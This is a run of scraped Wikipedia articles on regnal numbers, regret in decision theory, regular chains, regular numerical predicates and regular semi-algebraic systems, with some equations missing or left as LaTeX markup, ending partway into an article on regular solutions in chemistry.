As the Lordship of Ireland (1171–1542) and Kingdom of Ireland (1542–1800) were subordinate to the Kingdom of England , the English ordinals were used in Ireland even before the Acts of Union 1800 . William III of England and William IV of the United Kingdom were still called "William III" and "William IV" in Ireland, even though neither William I or William II ruled any part of Ireland. Similarly, the various Kings Henry are numbered II–VIII as they are in England even though Henry I of England never ruled any part of Ireland. Elizabeth I of England is referred to in Irish regnal year legal citations as "Elizabeth" rather than "Elizabeth I" because Ireland became a republic before Elizabeth II became queen. [ 10 ]
In some monarchies it is customary not to use an ordinal when there has been only one holder of that name. For example, Queen Victoria will not be called Victoria I unless there is a Victoria II. This tradition is applied in the United Kingdom , Belgium , Luxembourg , Norway and the Netherlands . It was also applied in most of the former German monarchies and in Hungary .
In Sweden and in the Vatican City State, the practice is not consistent. In Sweden, Sigismund and Adolf Frederick never have ordinals, whereas Frederick I often does. In the Vatican, John Paul I used an ordinal, but Francis refused to have one added to his name.
Other monarchies assign ordinals to monarchs even if they are the only ones of their name. This is a more recent invention and appears to have been done for the first time when Francis I of France issued testoons (silver coins) bearing the legend FRANCISCVS I DE. GR. FRANCORV. REX. This currently is the regular practice in Spain and Monaco (at least for Prince Albert I, as Princess Louise Hippolyte, who reigned 150 years earlier, does not appear to have used an ordinal). It was also applied in Brazil , Greece , Italy , Mexico , Montenegro , Portugal (where Kings Joseph , Louis and Charles are usually referred to as "Joseph I", "Louis I" and "Charles I" although there has not yet been any Joseph II, Louis II or Charles II, but Kings Denis , Edward , Sebastian and Henry are usually referred without the ordinal). The ordinal for King Juan Carlos I of Spain is used in both Spanish and English, but he is sometimes simply called King Juan Carlos of Spain in English. In Russia , use of "The First" ordinal started with Paul I of Russia . Before him, neither Anna of Russia nor Elizabeth of Russia had the "I" ordinal. In Ethiopia , Emperor Haile Selassie used the "I" ordinal ( Ge'ez : ቀዳማዊ , qädamawi ) although previous Ethiopian monarchs had not used it, and they are not referred as "the first" unless there were successors of the same name.
The Catholic papacy used the ordinal I under Pope John Paul I , but early popes who are the only ones to have reigned under a certain name are not referred to as "the first" (for instance, Peter the Apostle; his immediate successor, Pope Linus , as well as Pope Anacletus , are referred to without an ordinal). The most recent, Pope Francis (2013–2025), declined the use of an ordinal, but his Orthodox counterpart, Patriarch Bartholomew I of Constantinople , uses one, as does Aram I , the catholicos of the Armenian Apostolic Church .
In Austria , Emperors Francis , Ferdinand , Francis Joseph and Charles all styled themselves as "the first" although all were the only Emperors of Austria with those names. Three of those names were previously the names of Austrian Archdukes (the Archduchy of Austria was a state within the Holy Roman and the Austrian Empires), which makes three of these emperors Francis II, Ferdinand V, and Charles IV in their capacity as Archdukes. Francis Joseph was the first Austrian Archduke of that name.
The use of "The First" ordinal is also common to self-proclaimed ephemeral "kings" or "emperors", such as Napoleon I in France ; Dessalines , Christophe and Soulouque in Haiti ; Iturbide in Mexico ; Zog in Albania ; Bokassa in the Central African Empire ; Skossyreff in Andorra ; Theodore in Corsica ; and "Emperor" Norton in San Francisco . In those cases, they wanted to emphasize the change of regime they introduced or attempted to introduce.
It is traditional amongst French monarchists to continue to number their pretenders even though they have never reigned. Hence, a supporter of the late Comte de Paris would have referred to him as Henri VII even though only four men named "Henri" have been King of France .
Non-consecutive ordinals may indicate dynastic claims for non-regnant monarchs. For example, after Louis XVI of France was executed during the French Revolution , legitimists consider him to have been succeeded by his young son, whom they called Louis XVII . Although the child died in prison a few years later and never reigned, his uncle, who came to the French throne in the Bourbon Restoration , took the name Louis XVIII in acknowledgement of his dynasty's rights. Similarly, after Emperor Napoleon I 's regime collapsed, he abdicated in favour of his four-year-old son, who was proclaimed Napoleon II . The young emperor was deposed only weeks later by Napoleon's European rivals and was never recognized internationally; but when his first cousin Louis Napoleon Bonaparte proclaimed himself Emperor in 1852, he declared himself Napoleon III in recognition of his predecessor.
Following the Glorious Revolution , a line of pretenders descended from the dethroned James VII and II claimed the throne and declared themselves to be James VIII and III , Charles III and Henry IX and I . They numbered themselves separately for Scotland and England because they did not recognize the Acts of Union , which joined the two kingdoms into one in 1707, as valid.
James VII's last legitimate descendant died in 1807, and the claim passed to descendants of his sister Henrietta , Duchess of Orléans. Although none of them has actively claimed the throne, their supporters have assigned them the regnal numbers that they "should have had"; for example, from 1919 to 1955, the claim was held by "Robert I & IV" , which was numbered for England and Scotland respectively.
This custom is currently not followed by any other ethnic groups other than the French and British (Jacobites), being unique to them, monarchists from other nations do not usually use royal numbers for the pretenders they support.
While reigning monarchs use ordinals, ordinals are not used for royal female consorts. Thus, while King George V used an ordinal to distinguish him from other kings in the United Kingdoms called George, his wife, Queen Mary , had no ordinal.
The lack of an ordinal in the case of royal consorts complicates the recording of history, as there may be a number of consorts over time with the same name with no way to distinguish between them. For that reason, royal consorts are sometimes after their deaths recorded in history books and encyclopaedias by the use of their premarital name or, if they were from royalty or sovereign nobility, the name of the dynasty or the country. For example, Henry VIII of England 's fifth wife, Katherine Howard (of noble but not sovereign ancestry), is known by her maiden surname, and George V 's wife (a descendant of the sovereign ducal house of Württemburg) is commonly known as Mary of Teck (after her father's title) and Edward VII 's wife (a daughter of the King of Denmark) is known as Alexandra of Denmark . | https://en.wikipedia.org/wiki/Regnal_number |
In decision theory , regret aversion (or anticipated regret ) describes how the human emotional response of regret can influence decision-making under uncertainty . When individuals make choices without complete information, they often experience regret if they later discover that a different choice would have produced a better outcome. This regret can be quantified as the difference in value between the actual decision made and what would have been the optimal decision in hindsight.
Unlike traditional models that consider regret as merely a post-decision emotional response, the theory of regret aversion proposes that decision-makers actively anticipate potential future regret and incorporate this anticipation into their current decision-making process. This anticipation can lead individuals to make choices specifically designed to minimize the possibility of experiencing regret later, even if those choices are not optimal from a purely probabilistic expected-value perspective.
Regret is a powerful negative emotion with significant social and reputational implications, playing a central role in how humans learn from experience and in the psychology of risk aversion . The conscious anticipation of regret creates a feedback loop that elevates regret from being simply an emotional reaction—often modeled as mere human behavior —into a key factor in rational choice behavior that can be formally modeled in decision theory.
This anticipatory mechanism helps explain various observed decision patterns that deviate from standard expected utility theory , including status quo bias , inaction inertia, and the tendency to avoid decisions that might lead to easily imagined counterfactual scenarios where a better outcome would have occurred.
Regret theory is a model in theoretical economics simultaneously developed in 1982 by Graham Loomes and Robert Sugden , [ 1 ] David E. Bell, [ 2 ] and Peter C. Fishburn . [ 3 ] Regret theory models choice under uncertainty taking into account the effect of anticipated regret. Subsequently, several other authors improved upon it. [ 4 ]
It incorporates a regret term in the utility function which depends negatively on the realized outcome and positively on the best alternative outcome given the uncertainty resolution. This regret term is usually an increasing, continuous and non-negative function subtracted to the traditional utility index. These type of preferences always violate transitivity in the traditional sense, [ 5 ] although most satisfy a weaker version. [ 4 ]
For independent lotteries and when regret is evaluated over the difference between utilities and then averaged over the all combinations of outcomes, the regret can still be transitive but for only specific form of regret functional. It is shown that only hyperbolic sine function will maintain this property. [ 6 ] This form of regret inherits most of desired features, such as holding right preferences in face of first order stochastic dominance , risk averseness for logarithmic utilities and the ability to explain Allais paradox .
Regret aversion is not only a theoretical economics model, but a cognitive bias occurring as a decision has been made to abstain from regretting an alternative decision. To better preface, regret aversion can be seen through fear by either commission or omission; the prospect of committing to a failure or omitting an opportunity that we seek to avoid. [ 7 ] Regret, feeling sadness or disappointment over something that has happened, can be rationalized for a certain decision, but can guide preferences and can lead people astray. This contributes to the spread of disinformation because things are not seen as one's personal responsibility.
Several experiments over both incentivized and hypothetical choices attest to the magnitude of this effect.
Experiments in first price auctions show that by manipulating the feedback the participants expect to receive, significant differences in the average bids are observed. [ 8 ] In particular, "Loser's regret" can be induced by revealing the winning bid to all participants in the auction, and thus revealing to the losers whether they would have been able to make a profit and how much could it have been (a participant that has a valuation of $50, bids $30 and finds out the winning bid was $35 will also learn that he or she could have earned as much as $15 by bidding anything over $35.) This in turn allows for the possibility of regret and if bidders correctly anticipate this, they would tend to bid higher than in the case where no feedback on the winning bid is provided in order to decrease the possibility of regret.
In decisions over lotteries, experiments also provide supporting evidence of anticipated regret. [ 9 ] [ 10 ] [ 11 ] As in the case of first price auctions, differences in feedback over the resolution of the uncertainty can cause the possibility of regret and if this is anticipated, it may induce different preferences.
For example, when faced with a choice between $40 with certainty and a coin toss that pays $100 if the outcome is guessed correctly and $0 otherwise, not only does the certain payment alternative minimizes the risk but also the possibility of regret, since typically the coin will not be tossed (and thus the uncertainty not resolved) while if the coin toss is chosen, the outcome that pays $0 will induce regret. If the coin is tossed regardless of the chosen alternative, then the alternative payoff will always be known and then there is no choice that will eliminate the possibility of regret.
Anticipated regret tends to be overestimated for both choices and actions over which people perceive themselves to be responsible. [ 12 ] [ 13 ] People are particularly likely to overestimate the regret they will feel when missing a desired outcome by a narrow margin. In one study, commuters predicted they would experience greater regret if they missed a train by 1 minute more than missing a train by 5 minutes, for example, but commuters who actually missed their train by 1 or 5 minutes experienced (equal and) lower amounts of regret. Commuters appeared to overestimate the regret they would feel when missing the train by a narrow margin, because they tended to underestimate the extent to which they would attribute missing the train to external causes (e.g., missing their wallet or spending less time in the shower). [ 12 ]
Besides the traditional setting of choices over lotteries, regret aversion has been proposed as an explanation for the typically observed overbidding in first price auctions, [ 14 ] and the disposition effect , [ 15 ] among others.
The minimax regret approach is to minimize the worst-case regret, originally presented by Leonard Savage in 1951. [ 16 ] The aim of this is to perform as closely as possible to the optimal course. Since the minimax criterion applied here is to the regret (difference or ratio of the payoffs) rather than to the payoff itself, it is not as pessimistic as the ordinary minimax approach. Similar approaches have been used in a variety of areas such as:
One benefit of minimax (as opposed to expected regret) is that it is independent of the probabilities of the various outcomes: thus if regret can be accurately computed, one can reliably use minimax regret. However, probabilities of outcomes are hard to estimate.
This differs from the standard minimax approach in that it uses differences or ratios between outcomes, and thus requires interval or ratio measurements, as well as ordinal measurements (ranking), as in standard minimax.
Suppose an investor has to choose between investing in stocks, bonds or the money market, and the total return depends on what happens to interest rates. The following table shows some possible returns:
The crude maximin choice based on returns would be to invest in the money market, ensuring a return of at least 1. However, if interest rates fell then the regret associated with this choice would be large. This would be 11, which is the difference between the 12 which could have been received if the outcome had been known in advance and the 1 received. A mixed portfolio of about 11.1% in stocks and 88.9% in the money market would have ensured a return of at least 2.22; but, if interest rates fell, there would be a regret of about 9.78.
The regret table for this example, constructed by subtracting actual returns from best returns, is as follows:
Therefore, using a minimax choice based on regret, the best course would be to invest in bonds, ensuring a regret of no worse than 5. A mixed investment portfolio would do even better: 61.1% invested in stocks, and 38.9% in the money market would produce a regret no worse than about 4.28.
What follows is an illustration of how the concept of regret can be used to design a linear estimator .
In this example, the problem is to construct a linear estimator of a finite-dimensional parameter vector x {\displaystyle x} from its noisy linear measurement with known noise covariance structure. The loss of reconstruction of x {\displaystyle x} is measured using the mean-squared error (MSE). The unknown parameter vector is known to lie in an ellipsoid E {\displaystyle E} centered at zero. The regret is defined to be the difference between the MSE of the linear estimator that doesn't know the parameter x {\displaystyle x} , and the MSE of the linear estimator that knows x {\displaystyle x} . Also, since the estimator is restricted to be linear, the zero MSE cannot be achieved in the latter case. In this case, the solution of a convex optimization problem gives the optimal, minimax regret-minimizing linear estimator, which can be seen by the following argument.
According to the assumptions, the observed vector y {\displaystyle y} and the unknown deterministic parameter vector x {\displaystyle x} are tied by the linear model
where H {\displaystyle H} is a known n × m {\displaystyle n\times m} matrix with full column rank m {\displaystyle m} , and w {\displaystyle w} is a zero mean random vector with a known covariance matrix C w {\displaystyle C_{w}} .
Let
be a linear estimate of x {\displaystyle x} from y {\displaystyle y} , where G {\displaystyle G} is some m × n {\displaystyle m\times n} matrix. The MSE of this estimator is given by
Since the MSE depends explicitly on x {\displaystyle x} it cannot be minimized directly. Instead, the concept of regret can be used in order to define a linear estimator with good MSE performance. To define the regret here, consider a linear estimator that knows the value of the parameter x {\displaystyle x} , i.e., the matrix G {\displaystyle G} can explicitly depend on x {\displaystyle x} :
The MSE of x ^ o {\displaystyle {\hat {x}}^{o}} is
To find the optimal G ( x ) {\displaystyle G(x)} , M S E o {\displaystyle MSE^{o}} is differentiated with respect to G {\displaystyle G} and the derivative is equated to 0 getting
Then, using the Matrix Inversion Lemma
Substituting this G ( x ) {\displaystyle G(x)} back into M S E o {\displaystyle MSE^{o}} , one gets
This is the smallest MSE achievable with a linear estimate that knows x {\displaystyle x} . In practice this MSE cannot be achieved, but it serves as a bound on the optimal MSE. The regret of using the linear estimator specified by G {\displaystyle G} is equal to
The minimax regret approach here is to minimize the worst-case regret, i.e., sup x ∈ E R ( x , G ) . {\displaystyle \sup _{x\in E}R(x,G).} This will allow a performance as close as possible to the best achievable performance in the worst case of the parameter x {\displaystyle x} . Although this problem appears difficult, it is an instance of convex optimization and in particular a numerical solution can be efficiently calculated. [ 17 ] Similar ideas can be used when x {\displaystyle x} is random with uncertainty in the covariance matrix . [ 18 ] [ 19 ]
Camara, Hartline and Johnsen [ 20 ] study principal-agent problems . These are incomplete-information games between two players called Principal and Agent , whose payoffs depend on a state of nature known only by the Agent. The Principal commits to a policy, then the agent responds, and then the state of nature is revealed. They assume that the principal and agent interact repeatedly, and may learn over time from the state history, using reinforcement learning . They assume that the agent is driven by regret-aversion. In particular, the agent minimizes his counterfactual internal regret . Based on this assumption, they develop mechanisms that minimize the principal's regret.
Collina, Roth and Shao [ 21 ] improve their mechanism both in running-time and in the bounds for regret (as a function of the number of distinct states of nature). | https://en.wikipedia.org/wiki/Regret_(decision_theory) |
In mathematics , and more specifically in computer algebra and elimination theory , a regular chain is a particular kind of triangular set of multivariate polynomials over a field, where a triangular set is a finite sequence of polynomials such that each one contains at least one more indeterminate than the preceding one. The condition that a triangular set must satisfy to be a regular chain is that, for every k , every common zero (in an algebraically closed field ) of the k first polynomials may be prolongated to a common zero of the ( k + 1) th polynomial. In other words, regular chains allow solving systems of polynomial equations by solving successive univariate equations without considering different cases.
Regular chains enhance the notion of Wu's characteristic sets in the sense that they provide a better result with a similar method of computation.
Given a linear system , one can convert it to a triangular system via Gaussian elimination . For the non-linear case, given a polynomial system F over a field, one can convert (decompose or triangularize) it to a finite set of triangular sets, in the sense that the algebraic variety V (F) is described by these triangular sets.
A triangular set may merely describe the empty set. To fix this degenerated case, the notion of regular chain was introduced, independently by Kalkbrener (1993), Yang and Zhang (1994). Regular chains also appear in Chou and Gao (1992). Regular chains are special triangular sets which are used in different algorithms for computing unmixed-dimensional decompositions of algebraic varieties. Without using factorization, these decompositions have better properties that the ones produced by Wu's algorithm . Kalkbrener's original definition was based on the following observation: every irreducible variety is uniquely determined by one of its generic points and varieties can be represented by describing the generic points of their irreducible components. These generic points are given by regular chains.
Denote Q the rational number field. In Q [ x 1 , x 2 , x 3 ] with variable ordering x 1 < x 2 < x 3 ,
is a triangular set and also a regular chain. Two generic points given by T are ( a , a , a ) and ( a , − a , a ) where a is transcendental over Q .
Thus there are two irreducible components, given by { x 2 − x 1 , x 3 − x 1 } and { x 2 + x 1 , x 3 − x 1 } , respectively.
Note that: (1) the content of the second polynomial is x 2 , which does not contribute to the generic points represented and thus can be removed; (2) the dimension of each component is 1, the number of free variables in the regular chain.
The variables in the polynomial ring
are always sorted as x 1 < ⋯ < x n .
A non-constant polynomial f in R {\displaystyle R} can be seen as a univariate polynomial in its greatest variable.
The greatest variable in f is called its main variable, denoted by mvar ( f ). Let u be the main variable of f and write it as
where e is the degree of f with respect to u and a e {\displaystyle a_{e}} is the leading coefficient of f with respect to u . Then the initial of f is a e {\displaystyle a_{e}} and e is its main degree.
A non-empty subset T of R {\displaystyle R} is a triangular set, if the polynomials in T are non-constant and have distinct main variables. Hence, a triangular set is finite, and has cardinality at most n .
Let T = { t 1 , ..., t s } be a triangular set such that mvar ( t 1 ) < ⋯ < mvar ( t s ) , h i {\displaystyle h_{i}} be the initial of t i and h be the product of h i 's.
Then T is a regular chain if
where each resultant is computed with respect to the main variable of t i , respectively.
This definition is from Yang and Zhang, which is of much algorithmic flavor.
The quasi-component W ( T ) described by the regular chain T is
the set difference of the varieties V ( T ) and V ( h ).
The attached algebraic object of a regular chain is its saturated ideal
A classic result is that the Zariski closure of W ( T ) equals the variety defined by sat( T ), that is,
and its dimension is n − | T |, the difference of the number of variables and the number of polynomials in T .
In general, there are two ways to decompose a polynomial system F . The first one is to decompose lazily, that is, only to represent its generic points in the (Kalkbrener) sense,
The second is to describe all zeroes in the Lazard sense,
There are various algorithms available for triangular decompositions in either sense.
Let T be a regular chain in the polynomial ring R . | https://en.wikipedia.org/wiki/Regular_chain |
In computer science and mathematics , more precisely in automata theory , model theory and formal language , a regular numerical predicate is a kind of relation over integers. Regular numerical predicates can also be considered as a subset of N r {\displaystyle \mathbb {N} ^{r}} for some arity r {\displaystyle r} . One of the main interests of this class of predicates is that it can be defined in plenty of different ways, using different logical formalisms. Furthermore, most of the definitions use only basic notions, and thus allows to relate foundations of various fields of fundamental computer science such as automata theory , syntactic semigroup , model theory and semigroup theory .
The class of regular numerical predicate is denoted C l c a {\displaystyle {\mathcal {C}}_{lca}} , [ 1 ] : 140 N t h r e s , m o d {\displaystyle {\mathcal {N}}_{\mathtt {thres,mod}}} [ 2 ] and REG. [ 3 ]
The class of regular numerical predicate admits a lot of equivalent definitions. They are now given. In all of those definitions, we fix r ∈ N {\displaystyle r\in \mathbb {N} } and P ⊆ N r {\displaystyle P\subseteq \mathbb {N} ^{r}} a (numerical) predicate of arity r {\displaystyle r} .
The first definition encodes predicate as a formal language . A predicate is said to be regular if the formal language is regular . [ 3 ] : 25
Let the alphabet A {\displaystyle A} be the set of subset of { 1 , … , r } {\displaystyle \{1,\dots ,r\}} . Given a vector of r {\displaystyle r} integers n = ( n 0 , … , n r − 1 ) ∈ N r {\displaystyle \mathbf {n} =(n_{0},\dots ,n_{r-1})\in \mathbb {N} ^{r}} , it is represented by the word n ¯ {\displaystyle {\overline {\mathbf {n} }}} of length max ( n 0 , … , n r − 1 ) {\displaystyle \max(n_{0},\dots ,n_{r-1})} whose i {\displaystyle i} -th letter is { j ∣ n j = i } {\displaystyle \{j\mid n_{j}=i\}} . For example, the vector ( 3 , 1 , 3 ) {\displaystyle (3,1,3)} is represented by the word ∅ { 1 } ∅ { 0 , 2 } {\displaystyle \emptyset \{1\}\emptyset \{0,2\}} .
We then define P ¯ {\displaystyle {\overline {P}}} as { n ¯ ∣ n } {\displaystyle \{{\overline {\mathbf {n} }}\mid \mathbf {n} \}} .
The numerical predicate P {\displaystyle P} is said to be regular if P ¯ {\displaystyle {\overline {P}}} is a regular language over the alphabet A {\displaystyle A} . This is the reason for the use of the word "regular" to describe this kind of numerical predicate.
This second definition is similar to the previous one. Predicates are encoded into languages in a different way, and the predicate is said to be regular if and only if the language is regular. [ 3 ] : 25
Our alphabet A {\displaystyle A} is the set of vectors of r {\displaystyle r} binary digits. That is: { 0 , 1 } r {\displaystyle \{0,1\}^{r}} . Before explaining how to encode a vector of numbers, we explain how to encode a single number.
Given a length l {\displaystyle l} and a number n ≤ l {\displaystyle n\leq l} , the unary representation of n {\displaystyle n} of length l {\displaystyle l} is the word ∣ n ∣ l {\displaystyle \mid {n}\mid _{l}} over the binary alphabet { 0 , 1 } {\displaystyle \{0,1\}} , beginning by a sequence of n {\displaystyle n} "1"'s, followed by n − l {\displaystyle n-l} "0"'s. For example, the unary representation of 1 of length 4 is 1000 {\displaystyle 1000} .
Given a vector of r {\displaystyle r} integers n = ( n 0 , … , n r − 1 ) ∈ N r {\displaystyle \mathbf {n} =(n_{0},\dots ,n_{r-1})\in \mathbb {N} ^{r}} , let l = max ( n 0 , … , n r − 1 ) {\displaystyle l=\max(n_{0},\dots ,n_{r-1})} . The vector n {\displaystyle \mathbf {n} } is represented by the word n ¯ ∈ ( { 0 , 1 } r ) ∗ {\displaystyle {\overline {\mathbf {n} }}\in \left(\{0,1\}^{r}\right)^{*}} such that, the projection of n ¯ {\displaystyle {\overline {\mathbf {n} }}} over its i {\displaystyle i} -th component is ∣ n i ∣ max ( n 0 , … , n r − 1 ) {\displaystyle \mid {n_{i}}\mid _{\max(n_{0},\dots ,n_{r-1})}} . For example, the representation of ( 3 , 1 , 3 ) {\displaystyle (3,1,3)} is 1 1 1 1 0 0 1 1 1 {\displaystyle {\begin{array}{l|l|l}1&1&1\\1&0&0\\1&1&1\end{array}}} . This is a word whose letters are the vectors ( 1 , 1 , 1 ) {\displaystyle (1,1,1)} , ( 1 , 0 , 1 ) {\displaystyle (1,0,1)} and ( 1 , 0 , 1 ) {\displaystyle (1,0,1)} and whose projection over each components are 111 {\displaystyle 111} , 100 {\displaystyle 100} and 111 {\displaystyle 111} .
As in the previous definition, the numerical predicate P {\displaystyle P} is said to be regular if P ¯ {\displaystyle {\overline {P}}} is a regular language over the alphabet A {\displaystyle A} .
A predicate is regular if and only if it can be defined by a monadic second order formula ϕ ( x 0 , … , x r − 1 ) {\displaystyle \phi (x_{0},\dots ,x_{r-1})} , or equivalently by an existential monadic second order formula, where the only atomic predicate is the successor function y + 1 = z {\displaystyle y+1=z} . [ 3 ] : 26
A predicate is regular if and only if it can be defined by a first order logic formula ϕ ( x 0 , … , x r − 1 ) {\displaystyle \phi (x_{0},\dots ,x_{r-1})} , where the atomic predicates are:
The language of congruence arithmetic [ 1 ] : 140 is defined as the est of Boolean combinations, where the atomic predicates are:
A predicate is regular if and only if it can be defined in the language of congruence arithmetic. The equivalence with previous definition is due to quantifier elimination . [ 4 ]
This definition requires a fixed parameter m {\displaystyle m} . A set is said to be regular if it is m {\displaystyle m} -regular for some m ≥ 2 {\displaystyle m\geq 2} .
In order to introduce the definition of m {\displaystyle m} -regular , the trivial case where r = 0 {\displaystyle r=0} should be considered separately. When r = 0 {\displaystyle r=0} , then the predicate P {\displaystyle P} is either the constant true or the constant false. Those two predicates are said to be m {\displaystyle m} -regular (for every m {\displaystyle m} ). Let us now assume that r ≥ 1 {\displaystyle r\geq 1} . In order to introduce the definition of regular predicate in this case, we need to introduce the notion of section of a predicate .
The section P x i = c {\displaystyle P^{x_{i}=c}} of P {\displaystyle P} is the predicate of arity r − 1 {\displaystyle r-1} where the i {\displaystyle i} -th component is fixed to c {\displaystyle c} . Formally, it is defined as { ( x 0 , … , x i − 1 , x i + 1 , … , x r − 1 ) ∣ P ( x 0 , … , x i − 1 , c , x i + 1 , … , x r − 1 ) } {\displaystyle \{(x_{0},\dots ,x_{i-1},x_{i+1},\dots ,x_{r-1})\mid P(x_{0},\dots ,x_{i-1},c,x_{i+1},\dots ,x_{r-1})\}} . For example, let us consider the sum predicate S = { ( n 0 , n 1 , n 2 ) ∣ n 0 + n 1 = n 2 } {\displaystyle S=\{(n_{0},n_{1},n_{2})\mid n_{0}+n_{1}=n_{2}\}} . Then S x 0 = c = { ( n 1 , n 2 ) ∣ c + n 1 = n 2 } {\displaystyle S^{x_{0}=c}=\{(n_{1},n_{2})\mid c+n_{1}=n_{2}\}} is the predicate which adds the constant c {\displaystyle c} , and S x 2 = c = { ( n 0 , n 1 ) ∣ n 0 + n 1 = c } {\displaystyle S^{x_{2}=c}=\{(n_{0},n_{1})\mid n_{0}+n_{1}=c\}} is the predicate which states that the sum of its two elements is c {\displaystyle c} .
The last equivalent definition of regular predicate can now be given. A predicate P {\displaystyle P} of arity r ≥ 1 {\displaystyle r\geq 1} is m {\displaystyle m} -regular if it satisfies the two following conditions: [ 5 ]
The second property intuitively means that, when number are big enough, then their exact value does not matter. The properties which matters are the order relation between the numbers and their value modulo the period m {\displaystyle m} .
Given a subset s ⊆ { 0 , … , r − 1 } {\displaystyle s\subseteq \{0,\dots ,r-1\}} , let s ¯ {\displaystyle {\overline {s}}} be the characteristic vector of s {\displaystyle s} . That is, the vector in { 0 , 1 } r {\displaystyle \{0,1\}^{r}} whose i {\displaystyle i} -th component is 1 if i ∈ s {\displaystyle i\in s} , and 0 otherwise. Given a sequence s = s 0 ⊊ ⋯ ⊊ s p − 1 {\displaystyle \mathbf {s} =s_{0}\subsetneq \dots \subsetneq s_{p-1}} of sets, let P s = { ( n 0 , … , n p − 1 ) ∈ N p ∣ P ( ∑ n i e i ) } {\displaystyle P_{\mathbf {s} }=\{(n_{0},\dots ,n_{p-1})\in \mathbb {N} ^{p}\mid P(\sum n_{i}e_{i})\}} .
The predicate P {\displaystyle P} is regular if and only if for each increasing sequence of set s {\displaystyle \mathbf {s} } , P s {\displaystyle P_{\mathbf {s} }} is a recognizable submonoid of N p {\displaystyle \mathbb {N} ^{p}} . [ 2 ]
The predicate P {\displaystyle P} is regular if and only if all languages which can be defined in first order logic with atomic predicates for letters and the atomic predicate P {\displaystyle P} are regular. The same property would hold for the monadic second order logic, and with modular quantifiers. [ 1 ]
The following property allows to reduce an arbitrarily complex non-regular predicate to a simpler binary predicate which is also non-regular. [ 5 ]
Let us assume that P {\displaystyle P} is definable in Presburger Arithmetic. The predicate P {\displaystyle P} is non regular if and only if there exists a formula in F O [ ≤ , R ] {\displaystyle \mathbf {FO} [\leq ,R]} which defines the multiplication by a rational p q ∉ { 0 , 1 } {\displaystyle {\frac {p}{q}}\not \in \{0,1\}} . More precisely, it allows to define the non-regular predicate { ( p × n , q × n ) ∣ n ∈ N } {\displaystyle \{(p\times n,q\times n)\mid n\in \mathbb {N} \}} for some p ∉ 0 , q {\displaystyle p\not \in {0,q}} .
The class of regular numerical predicate satisfies many properties.
As in previous case, let us assume that P {\displaystyle P} is definable in Presburger Arithmetic. The satisfiability of ∃ M S O ( + 1 , P ) {\displaystyle \exists \mathbf {MSO} (+1,P)} is decidable if and only if P {\displaystyle P} is regular.
This theorem is due to the previous property and the fact that the satisfiability of ∃ M S O ( + 1 , × p q ) {\displaystyle \exists \mathbf {MSO} (+1,\times {\frac {p}{q}})} is undecidable when p ≠ 0 {\displaystyle p\neq 0} and p ≠ q {\displaystyle p\neq q} . [ citation needed ]
The class of regular predicates is closed under union, intersection, complement, taking a section, projection and Cartesian product. All of those properties follows directly from the definition of this class as the class of predicates definable in F O ( ≤ , mod ) {\displaystyle \mathbf {FO} (\leq ,\mod )} . [ citation needed ]
It is decidable whether a predicate defined in Presburger arithmetic is regular. [ 2 ]
The logic F O ( ≤ , + c , mod ) {\displaystyle \mathbf {FO} (\leq ,+c,\mod )} considered above admit the elimination of quantifier. More precisely, the algorithm for elimination of quantifier by Cooper [ 6 ] does not introduce multiplication by constants nor sums of variable. Therefore, when applied to a F O ( ≤ , + c , mod ) {\displaystyle \mathbf {FO} (\leq ,+c,\mod )} it returns a quantifier-free formula in F O ( ≤ , + c , mod ) {\displaystyle \mathbf {FO} (\leq ,+c,\mod )} . | https://en.wikipedia.org/wiki/Regular_numerical_predicate |
In computer algebra , a regular semi-algebraic system is a particular kind of triangular system of multivariate polynomials over a real closed field.
Regular chains and triangular decompositions are fundamental and well-developed tools for describing the complex solutions of polynomial systems. The notion of a regular semi-algebraic system is an adaptation of the concept of a regular chain focusing on solutions of the real analogue: semi-algebraic systems.
Any semi-algebraic system S {\displaystyle S} can be decomposed into finitely many regular semi-algebraic systems S 1 , … , S e {\displaystyle S_{1},\ldots ,S_{e}} such that a point (with real coordinates) is a solution of S {\displaystyle S} if and only if it is a solution of one of the systems S 1 , … , S e {\displaystyle S_{1},\ldots ,S_{e}} . [ 1 ]
Let T {\displaystyle T} be a regular chain of k [ x 1 , … , x n ] {\displaystyle \mathbf {k} [x_{1},\ldots ,x_{n}]} for some ordering of the variables x = x 1 , … , x n {\displaystyle \mathbf {x} =x_{1},\ldots ,x_{n}} and a real closed field k {\displaystyle \mathbf {k} } . Let u = u 1 , … , u d {\displaystyle \mathbf {u} =u_{1},\ldots ,u_{d}} and y = y 1 , … , y n − d {\displaystyle \mathbf {y} =y_{1},\ldots ,y_{n-d}} designate respectively the variables of x {\displaystyle \mathbf {x} } that are free and algebraic with respect to T {\displaystyle T} . Let P ⊂ k [ x ] {\displaystyle P\subset \mathbf {k} [\mathbf {x} ]} be finite such that each polynomial in P {\displaystyle P} is regular with respect to the saturated ideal of T {\displaystyle T} . Define P > := { p > 0 ∣ p ∈ P } {\displaystyle P_{>}:=\{p>0\mid p\in P\}} . Let Q {\displaystyle {\mathcal {Q}}} be a quantifier-free formula of k [ x ] {\displaystyle \mathbf {k} [\mathbf {x} ]} involving only the variables of u {\displaystyle \mathbf {u} } . We say that R := [ Q , T , P > ] {\displaystyle R:=[{\mathcal {Q}},T,P_{>}]} is a regular semi-algebraic system if the following three conditions hold.
The zero set of R {\displaystyle R} , denoted by Z k ( R ) {\displaystyle Z_{\mathbf {k} }(R)} , is defined as the set of points ( u , y ) ∈ k d × k n − d {\displaystyle (u,y)\in \mathbf {k} ^{d}\times \mathbf {k} ^{n-d}} such that Q ( u ) {\displaystyle {\mathcal {Q}}(u)} is true and t ( u , y ) = 0 , p ( u , y ) > 0 {\displaystyle t(u,y)=0,p(u,y)>0} , for all t ∈ T {\displaystyle t\in T} and all p ∈ P {\displaystyle p\in P} . Observe that Z k ( R ) {\displaystyle Z_{\mathbf {k} }(R)} has dimension d {\displaystyle d} in the affine space k n {\displaystyle \mathbf {k} ^{n}} .
This polynomial -related article is a stub . You can help Wikipedia by expanding it .
This computing article is a stub . You can help Wikipedia by expanding it .
This algebraic geometry –related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Regular_semi-algebraic_system |
In chemistry , a regular solution is a solution whose entropy of mixing is equal to that of an ideal solution with the same composition, but is non-ideal due to a nonzero enthalpy of mixing . [ 1 ] [ 2 ] Such a solution is formed by random mixing of components of similar molar volume and without strong specific interactions, [ 1 ] [ 2 ] and its behavior diverges from that of an ideal solution by showing phase separation at intermediate compositions and temperatures (a miscibility gap ). [ 3 ] Its entropy of mixing is equal to that of an ideal solution with the same composition, due to random mixing without strong specific interactions. [ 1 ] [ 2 ] For two components
